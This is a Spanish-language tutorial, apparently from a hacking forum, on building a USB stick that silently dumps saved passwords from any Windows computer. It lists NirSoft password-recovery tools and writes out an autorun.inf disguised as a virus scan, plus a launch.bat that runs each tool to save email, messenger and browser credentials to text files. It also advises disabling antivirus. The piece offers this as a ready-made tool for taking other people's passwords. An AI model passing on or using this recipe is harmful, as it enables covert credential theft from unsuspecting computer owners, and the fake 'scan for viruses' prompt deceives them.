Recuperar contraseñas guardadas en Windows desde un USB drive (Flash)
Como todos sabemos, Windows guarda la mayoría de contraseñas que son usadas a diario, incluyendo contraseñas de Mensajeria Instantánea como MSN, Yahoo, AOL, Windows Messenger etc. Junto con estos, Windows también guarda las contraseñas de cuentas de Outlook Express, SMTP, POP (correo), FTP y contraseñas de autocompetado de muchos navegadores como IE y Firefox. Existen varias herramientas para "recuperar" estas contraseñas de los lugares donde han sido guardadas. Usando estas herramientas y un USB.
Nuestros Software's que necesitaremos son los siguientes....
MessenPass:
Recupera las contraseñas de la mayoría de programas de mensajería instantánea:
MSN Messenger
Windows Messenger (Windows XP)
Windows Live Messenger (Windows XP/Vista/7)
Yahoo Messenger (Versiones 5.x and 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger v4.6 o anterior, AIM 6.x, y AIM Pro.
Trillian
Trillian Astra
Miranda
GAIM/Pidgin
MySpace IM
PaltalkScene
Digsby
Link http://www.nirsoft.net/utils/mspass.html
Mail PassView:
Recupera las contraseñas de los siguientes programas de email:
Outlook Express
Microsoft Outlook 2000 (POP3 and SMTP)
Microsoft Outlook 2002/2003/2007/2010 (POP3, IMAP, HTTP y SMTP)
Windows Mail
Windows Live Mail
IncrediMail
Eudora
Netscape 6.x/7.x (si la contraseña no ha sido encriptada con contraseña maestra)
Mozilla Thunderbird (si la contraseña no ha sido encriptada con contraseña maestra
Group Mail Free
Yahoo! Mail - si la contraseña es guardada en la aplicación Yahoo! Messenger.
Hotmail/MSN mail - si la contraseña es guardada en la aplicación MSN/Windows/Live Messenger.
Gmail - si la contraseña es guardada por la aplicación de notificación de Gmail, Google Desktop, o por Google Talk.
Por cada cuenta de email, los siguientes campos son mostrados: nombre de la cuenta, aplicación, email, servidor, tipo de servidor (POP3/IMAP/SMTP), nombre de usuario y contraseña.
Link http://www.nirsoft.net/utils/mailpv.html
IE PassView:
Es una utilidad pequeña que revela las contraseñas guardadas por el navegador Internet Explore. Soporta todas las versiones de IE desde la 4.0 hasta la 9.0
Link http://www.nirsoft.net/utils/internet_explorer_password.html
Protected Storage PassView
Recupera todas las contraseñas guardadas dentro del almacenaje protegido, incluyendo las contraseñas de auto completar de IE, las contraseñas de sitios protegidos por contraseña, contraseñas de MSN Explorer, y más...
Link http://www.nirsoft.net/utils/pspv.html
PasswordFox
Nos permite mirar los nombres de usuarios y contraseñas guardadas por Mozilla Firefox. Muestra: indice del registro, pagina web, nombre de usuario, contraseña, campo de nombre de usuario, campo de contraseña y nombre del archivo.
Link http://www.nirsoft.net/utils/passwordfox.html
Acá el procedimiento paso a paso para crear nuestro toolkit
NOTA: tienes que cerrar tu antivirus antes de seguir estos pasos pero sino deseas no importa =).
1. Descarga todas las 5 herramientas, extraelas y copia a tu USB solamente los archivos ejecutables (.exe)
Copia los archivos mspass.exe, mailpv.exe, iepv.exe, pspv.exe y passwordfox.exe a tu USB
2. Crea un documento nuevo en Notepad (libreta de notas) y escribe el siguiente texto:
open=launch.bat[autorun]
ACTION= Buscar virus en el dispositivo USB
Guarda el archivo como autorun.inf
Ahora copia el archivo autorun.inf a tu USB
3. Crea otro documento en Notepad y escribe lo siguiente:
start mailpv.exe /stext mailpv.txtstart mspass.exe /stext mspass.txt
start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
Guarda el archivo como launch.bat
Copia el archivo launch.bat a tu USB
¡Ahora nuestro Rootkit esta listo para hackear contraseñas!
Puedes usar tu USB para hackear contraseñas guardadas en cualquier computador Windows con estos pasos:
1. Conecta tu memoria USB y el autorun abrirá una ventana (porque hemos creado una USB autoejecutable).
2. En la ventana que se abrió, elige la primera opción (Buscar virus en el dispositivo USB).
3. Ahora todas las herramientas de recuperación de contraseñas se ejecutaran silenciosamente en el fondo (este proceso dura apenas segundos). Las contraseñas se almacenaran en los archivos .TXT
4. Remover la memoria USB y podremos ver las contraseñas almacenadas en los archivos .TXT
Esto funciona con Windows 2000, XP, Vista y 7
Quedaría así
SDK - > El conocimiento es libre.
